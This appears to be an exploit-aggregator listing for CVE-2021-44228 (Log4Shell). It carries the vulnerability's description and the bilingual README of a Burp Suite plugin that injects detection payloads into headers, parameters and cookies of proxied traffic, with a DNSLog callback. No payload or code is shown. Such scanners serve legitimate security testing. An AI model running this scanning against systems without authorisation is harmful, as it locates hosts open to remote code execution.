CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

https://github.com/snow0715/log4j-Scan-Burpsuite

Associated Vulnerability

Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Description

Log4j漏洞（CVE-2021-44228）的Burpsuite检测插件

Readme

# log4j-Scan-Burpsuite
Log4j漏洞（CVE-2021-44228）的Burpsuite检测插件
包含开关(ON/OFF)、过滤(Filter)、发送(Send)

# 功能：
自动替换请求头

自动替换POST请求application/json参数

自动替换POST请求application/x-www-urlencoded参数

自动替换GET请求参数

单次发包仅替换一个参数

# 2022.1.26
1、新增Cookie字段检测，依次替换Cookie参数

2、修复按钮显示异常BUG

3、更新UI为英文

# DNSLog
https://log.xn--9tr.com/

# 插件页面展示

![image](https://user-images.githubusercontent.com/54879520/151101186-5eef97b9-8bc8-4bd2-94ea-69deaf2cf5cc.png)
![image](https://user-images.githubusercontent.com/54879520/146352764-86d3c09f-f6d6-4107-867a-4e7860547959.png)


# 使用
被动检测所有通过Burpsuite的流量包、手动发送需要检测的请求包进行检测

Passively detect all traffic packets passing through Burpsuite, and manually send request packets that need to be detected for detection

# 按钮

通过开关按钮选择开启或关闭扫描功能，开启后所有通过Burpsuite的流量都将进行log4j漏洞检测（此处偶尔出现BUG，实际开关状态以文字显示为主）

Use the switch button to choose to turn on or off the scanning function. After turning on, all traffic passing through Burpsuite will be tested for log4j vulnerabilities (BUG occasionally appears here, and the actual switch status is mainly displayed in text)

![image](https://user-images.githubusercontent.com/54879520/146351788-4233ddba-e2a1-46ef-9323-01ad14a6dc12.png)


通过输入域名进行过滤，只针对需要检测的域名相关报文进行检测

Filter by entering the domain name, and detect only the domain-related packets that need to be detected

![image](https://user-images.githubusercontent.com/54879520/146352060-29bfbeb1-7166-4065-a6ed-39111f4ad0cd.png)


通过点击“扫描列表清空”按钮，清理扫描列表

Clear the scan list by clicking the "Clear Scan List" button

![image](https://user-images.githubusercontent.com/54879520/146353005-ae21447f-a81e-419d-b75e-8b5340477b05.png)
![image](https://user-images.githubusercontent.com/54879520/146353057-7d73cc31-c4a0-4a17-beaf-5016b8c40a5e.png)

选择需要发送的请求并且右键点击，发送至log4j Scan插件进行检测

Select the request to be sent and right-click to send it to the log4j Scan plugin for detection

![image](https://user-images.githubusercontent.com/54879520/146351539-4dc42228-424a-47aa-a35d-8ba4275f61a0.png)


# 免责声明
请勿将本项目技术或代码应用在恶意软件制作、软件著作权/知识产权盗取或不当牟利等非法用途中。实施上述行为或利用本项目对非自己著作权所有的程序进行数据嗅探将涉嫌违反《中华人民共和国刑法》第二百一十七条、第二百八十六条，《中华人民共和国网络安全法》《中华人民共和国计算机软件保护条例》等法律规定。本项目提及的技术仅可用于私人学习测试等合法场景中，任何不当利用该技术所造成的刑事、民事责任均与本项目作者无关。

File Snapshot


 [4.0K]  /data/pocs/3ca2d1808c9e111077c7674a9b6176dee5c308e6
├── [3.1K]  README.md
└── [4.0K]  src
    └── [ 35K]  BurpExtender.java

1 directory, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!